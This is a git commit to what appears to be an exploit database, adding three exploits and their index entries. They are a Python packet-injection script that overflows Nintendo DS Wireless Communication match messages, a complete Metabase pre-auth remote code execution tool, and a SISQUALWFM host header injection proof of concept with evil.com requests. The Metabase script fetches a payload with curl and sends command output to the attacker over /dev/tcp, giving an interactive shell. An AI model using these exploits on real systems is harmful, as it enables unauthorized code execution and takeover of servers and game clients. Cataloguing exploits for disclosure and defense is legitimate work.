DB: 2024-02-16

4 changes to exploits/shellcodes/ghdb DS Wireless Communication - Remote Code Execution Metabase 0.46.6 - Pre-Auth Remote Code Execution SISQUALWFM 7.1.319.103 - Host Header Injection
2024-02-16 00:16:25 +00:00 · 2024-02-16 00:16:25 +00:00 · bdcc81a451
commit bdcc81a451
parent 5c0c152cec
4 changed files with 338 additions and 0 deletions
--- a/exploits/hardware/local/51798.py
+++ b/exploits/hardware/local/51798.py
@ -0,0 +1,68 @@
 # Exploit Title: DS Wireless Communication Remote Code Execution
 # Date: 11 Oct 2023
 # Exploit Author: MikeIsAStar
 # Vendor Homepage: https://www.nintendo.com
 # Version: Unknown
 # Tested on: Wii
 # CVE: CVE-2023-45887
 """This code will inject arbitrary code into a client's game.
 You are fully responsible for all activity that occurs while using this code.
 The author of this code can not be held liable to you or to anyone else as a
 result of damages caused by the usage of this code.
 """
 import re
 import sys
 try:
    import pydivert
 except ModuleNotFoundError:
    sys.exit("The 'pydivert' module is not installed !")
 # Variables
 LR_SAVE = b'\x41\x41\x41\x41'
 assert len(LR_SAVE) == 0x04
 PADDING = b'MikeStar'
 assert len(PADDING) > 0x00
 # Constants
 DWC_MATCH_COMMAND_INVALID = b'\xFE'
 PADDING_LENGTH = 0x23C
 FINAL_KEY = b'\\final\\'
 WINDIVERT_FILTER = 'outbound and tcp and tcp.PayloadLength > 0'
 def try_modify_payload(payload):
    message_pattern = rb'\\msg\\GPCM([1-9][0-9]?)vMAT'
    message = re.search(message_pattern, payload)
    if not message:
        return None
    payload = payload[:message.end()]
    payload += DWC_MATCH_COMMAND_INVALID
    payload += (PADDING * (PADDING_LENGTH // len(PADDING) + 1))[:PADDING_LENGTH]
    payload += LR_SAVE
    payload += FINAL_KEY
    return payload
 def main():
    try:
        with pydivert.WinDivert(WINDIVERT_FILTER) as packet_buffer:
            for packet in packet_buffer:
                payload = try_modify_payload(packet.payload)
                if payload is not None:
                    print('Modified a GPCM message !')
                    packet.payload = payload
                packet_buffer.send(packet)
    except KeyboardInterrupt:
        pass
    except PermissionError:
        sys.exit('This program must be run with administrator privileges !')
 if __name__ == '__main__':
    main()
--- a/exploits/linux/webapps/51797.py
+++ b/exploits/linux/webapps/51797.py
@ -0,0 +1,165 @@
 # Exploit Title: metabase 0.46.6 - Pre-Auth Remote Code Execution
 # Google Dork: N/A
 # Date: 13-10-2023
 # Exploit Author: Musyoka Ian
 # Vendor Homepage: https://www.metabase.com/
 # Software Link: https://www.metabase.com/
 # Version: metabase 0.46.6
 # Tested on: Ubuntu 22.04, metabase 0.46.6
 # CVE : CVE-2023-38646
 #!/usr/bin/env python3
 import socket
 from http.server import HTTPServer, BaseHTTPRequestHandler
 from typing import Any
 import requests
 from socketserver import ThreadingMixIn
 import threading
 import sys
 import argparse
 from termcolor import colored
 from cmd import Cmd
 import re
 from base64 import b64decode
 class Termial(Cmd):
    prompt = "metabase_shell > "
    def default(self,args):
        shell(args)
 class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        global success
        if self.path == "/exploitable":
            self.send_response(200)
            self.end_headers()
            self.wfile.write(f"#!/bin/bash\n$@ | base64 -w 0  > /dev/tcp/{argument.lhost}/{argument.lport}".encode())
            success = True
        else:
            print(self.path)
            #sys.exit(1)
    def log_message(self, format: str, *args: Any) -> None:
        return None
 class Server(HTTPServer):
    pass
 def run():
    global httpserver
    httpserver = Server(("0.0.0.0", argument.sport), Handler)
    httpserver.serve_forever()
 def exploit():
    global success, setup_token
    print(colored("[*] Retriving setup token", "green"))
    setuptoken_request = requests.get(f"{argument.url}/api/session/properties")
    setup_token = re.search('"setup-token":"(.*?)"', setuptoken_request.text, re.DOTALL).group(1)
    print(colored(f"[+] Setup token: {setup_token}", "green"))
    print(colored("[*] Tesing if metabase is vulnerable", "green"))
    payload = {
        "token": setup_token,
        "details":
        {
            "is_on_demand": False,
            "is_full_sync": False,
            "is_sample": False,
            "cache_ttl": None,
            "refingerprint": False,
            "auto_run_queries": True,
            "schedules":
            {},
            "details":
            {
                "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('http://{argument.lhost}:{argument.sport}/exploitable').openConnection().getContentLength()\n$$--=x\\;",
                "advanced-options": False,
                "ssl": True
                },
                "name": "an-sec-research-musyoka",
                "engine": "h2"
                }
                }
    timer = 0
    print(colored(f"[+] Starting http server on port {argument.sport}", "blue"))
    thread = threading.Thread(target=run, )
    thread.start()
    while timer != 120:
        test = requests.post(f"{argument.url}/api/setup/validate", json=payload)
        if success == True :
            print(colored("[+] Metabase version seems exploitable", "green"))
            break
        elif timer == 120:
            print(colored("[-] Service does not seem exploitable exiting ......", "red"))
            sys.exit(1)
    print(colored("[+] Exploiting the server", "red"))
    terminal = Termial()
    terminal.cmdloop()
 def shell(command):
    global setup_token, payload2
    payload2 = {
        "token": setup_token,
        "details":
        {
            "is_on_demand": False,
            "is_full_sync": False,
            "is_sample": False,
            "cache_ttl": None,
            "refingerprint": False,
            "auto_run_queries": True,
            "schedules":
            {},
            "details":
            {
                "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl {argument.lhost}:{argument.sport}/exploitable -o /dev/shm/exec.sh')\n$$--=x",
                "advanced-options": False,
                "ssl": True
                },
                "name": "an-sec-research-team",
                "engine": "h2"
                }
                }
    output = requests.post(f"{argument.url}/api/setup/validate", json=payload2)
    bind_thread = threading.Thread(target=bind_function, )
    bind_thread.start()
    #updating the payload
    payload2["details"]["details"]["db"] = f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash /dev/shm/exec.sh {command}')\n$$--=x"
    requests.post(f"{argument.url}/api/setup/validate", json=payload2)
    #print(output.text)
 def bind_function():
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.bind(("0.0.0.0", argument.lport))
        sock.listen()
        conn, addr = sock.accept()
        data = conn.recv(10240).decode("ascii")
        print(f"\n{(b64decode(data)).decode()}")
    except Exception as ex:
        print(colored(f"[-] Error: {ex}", "red"))
        pass
 if __name__ == "__main__":
    print(colored("[*] Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]", "magenta"))
    args = argparse.ArgumentParser(description="Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]")
    args.add_argument("-l", "--lhost", metavar="", help="Attacker's bind IP Address", type=str, required=True)
    args.add_argument("-p", "--lport", metavar="", help="Attacker's bind port", type=int, required=True)
    args.add_argument("-P", "--sport", metavar="", help="HTTP Server bind port", type=int, required=True)
    args.add_argument("-u", "--url", metavar="", help="Metabase web application URL", type=str, required=True)
    argument  = args.parse_args()
    if argument.url.endswith("/"):
        argument.url = argument.url[:-1]
    success = False
    exploit()
--- a/exploits/multiple/webapps/51796.txt
+++ b/exploits/multiple/webapps/51796.txt
@ -0,0 +1,102 @@
 # Exploit Title: SISQUALWFM 7.1.319.103 Host Header Injection
 # Discovered Date: 17/03/2023
 # Reported Date: 17/03/2023
 # Resolved Date: 13/10/2023
 # Exploit Author: Omer Shaik (unknown_exploit)
 # Vendor Homepage: https://www.sisqualwfm.com
 # Version: 7.1.319.103
 # Tested on: SISQUAL WFM 7.1.319.103
 # Affected Version: sisqualWFM - 7.1.319.103
 # Fixed Version: sisqualWFM - 7.1.319.111
 # CVE : CVE-2023-36085
 # CVSS: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
 # Category: Web Apps
 A proof-of-concept(POC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the host header.
 ****************************************************************************************************
 Orignal Request
 ****************************************************************************************************
 GET /sisqualIdentityServer/core/login HTTP/2
 Host: sisqualwfm.cloud
 Cookie:<cookie>
 Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
 Sec-Ch-Ua-Mobile: ?0
 Sec-Ch-Ua-Platform: "Linux"
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Sec-Fetch-Site: none
 Sec-Fetch-Mode: navigate
 Sec-Fetch-User: ?1
 Sec-Fetch-Dest: document
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
 ****************************************************************************************************
 Orignal Response
 ****************************************************************************************************
 HTTP/2 302 Found
 Cache-Control: no-store, no-cache, must-revalidate
 Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
 X-Content-Type-Options: nosniff
 X-Frame-Options: sameorigin
 Date: Wed, 22 Mar 2023 13:22:10 GMT
 Content-Length: 0
 ****************************************************************************************************
 ██████╗  ██████╗  ██████╗
 ██╔══██╗██╔═══██╗██╔════╝
 ██████╔╝██║   ██║██║
 ██╔═══╝ ██║   ██║██║
 ██║     ╚██████╔╝╚██████╗
 ╚═╝      ╚═════╝  ╚═════╝
 ****************************************************************************************************
 Request has been modified to redirect user to evil.com (Intercepted request using Burp proxy)
 ****************************************************************************************************
 GET /sisqualIdentityServer/core/login HTTP/2
 Host: evil.com
 Cookie:<cookie>
 Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
 Sec-Ch-Ua-Mobile: ?0
 Sec-Ch-Ua-Platform: "Linux"
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Sec-Fetch-Site: none
 Sec-Fetch-Mode: navigate
 Sec-Fetch-User: ?1
 Sec-Fetch-Dest: document
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
 ****************************************************************************************************
 Response
 ****************************************************************************************************
 HTTP/2 302 Found
 Cache-Control: no-store, no-cache, must-revalidate
 Location: https://evil.com/sisqualIdentityServer/core/
 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
 X-Content-Type-Options: nosniff
 X-Frame-Options: sameorigin
 Content-Length: 0
 ****************************************************************************************************
 Method of Attack
 ****************************************************************************************************
 curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv
 ****************************************************************************************************
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -3259,6 +3259,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34954,exploits/hardware/local/34954.txt,"Cisco Unified Communications Manager 8.0 - Invalid Argument Privilege Escalation",2010-11-03,"Knud Erik Hjgaard",local,hardware,,2010-11-03,2014-10-14,1,CVE-2010-3039;OSVDB-69158,,,,,https://www.securityfocus.com/bid/44672/info
 50773,exploits/hardware/local/50773.sh,"Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation",2022-02-21,ibby,local,hardware,,2022-02-21,2022-02-21,0,,,,,,
 24899,exploits/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Local Privilege Escalation",2013-03-29,"Mohammad abou hayt",local,hardware,,2013-03-29,2013-03-29,0,OSVDB-91811,,,,,
 51798,exploits/hardware/local/51798.py,"DS Wireless Communication - Remote Code Execution",2024-02-15,MikeIsAStar,local,hardware,,2024-02-15,2024-02-15,0,,,,,,
 50283,exploits/hardware/local/50283.txt,"ECOA Building Automation System - Missing Encryption Of Sensitive Information",2021-09-13,Neurogenesia,local,hardware,,2021-09-13,2021-09-13,0,,,,,,
 51414,exploits/hardware/local/51414.py,"FS-S3900-24T4S - Privilege Escalation",2023-05-02,"Daniele Linguaglossa",local,hardware,,2023-05-02,2023-05-02,0,CVE-2023-30350,,,,,
 44306,exploits/hardware/local/44306.c,"Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation",2016-01-24,pray3r,local,hardware,,2018-03-19,2018-03-19,0,CVE-2015-8088,,,,,https://github.com/hardenedlinux/offensive_poc/blob/0cfe3764a0388e3715b018d1d59ef801f8b16b73/CVE-2015-8088/cve-2015-8088-poc.c
@ -8945,6 +8946,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 10433,exploits/linux/webapps/10433.txt,"Mail Manager Pro - Cross-Site Request Forgery (Change Admin Password)",2009-12-14,"Milos Zivanovic",webapps,linux,80,2009-12-13,,1,OSVDB-61052;CVE-2009-4827,,,,,
 14818,exploits/linux/webapps/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution",2010-08-27,"Nikolas Sotiriu",webapps,linux,,2010-08-27,2017-07-19,0,,,,,,
 44681,exploits/linux/webapps/44681.txt,"Merge PACS 7.0 - Cross-Site Request Forgery",2018-05-21,"Safak Aslan",webapps,linux,,2018-05-21,2018-06-15,0,,"Cross-Site Request Forgery (CSRF)",,,,
 51797,exploits/linux/webapps/51797.py,"Metabase 0.46.6 - Pre-Auth Remote Code Execution",2024-02-15,"Musyoka Ian",webapps,linux,,2024-02-15,2024-02-15,0,,,,,,
 46450,exploits/linux/webapps/46450.txt,"Micro Focus Filr 3.4.0.217 - Path Traversal / Local Privilege Escalation",2019-02-22,SecureAuth,webapps,linux,,2019-02-22,2019-02-22,1,CVE-2019-3475;CVE-2019-3474,Traversal,,,,https://www.secureauth.com/labs/advisories/micro-focus-filr-multiple-vulnerabilities
 47457,exploits/linux/webapps/47457.py,"mintinstall 7.9.9 - Code Execution",2019-10-03,"İbrahim Hakan Şeker",webapps,linux,,2019-10-03,2019-10-03,0,CVE-2019-17080,,,,,
 28653,exploits/linux/webapps/28653.txt,"mod_accounting Module 0.5 - Blind SQL Injection",2013-09-30,Wireghoul,webapps,linux,,2013-09-30,2013-09-30,0,CVE-2013-5697;OSVDB-97588,,,,,
@ -12176,6 +12178,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51150,exploits/multiple/webapps/51150.txt,"Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)",2023-03-30,"Andrey Stoykov",webapps,multiple,,2023-03-30,2023-03-30,0,,,,,,
 48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,,
 50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,,
 51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,,
 33717,exploits/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting",2010-03-05,Phenom,webapps,multiple,,2010-03-05,2014-06-12,1,,,,,,https://www.securityfocus.com/bid/38575/info
 49415,exploits/multiple/webapps/49415.py,"SmartAgent 3.1.0 - Privilege Escalation",2021-01-12,"Orion Hridoy",webapps,multiple,,2021-01-12,2021-01-12,0,,,,,,
 48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple,,2020-06-12,2020-06-12,0,,,,,,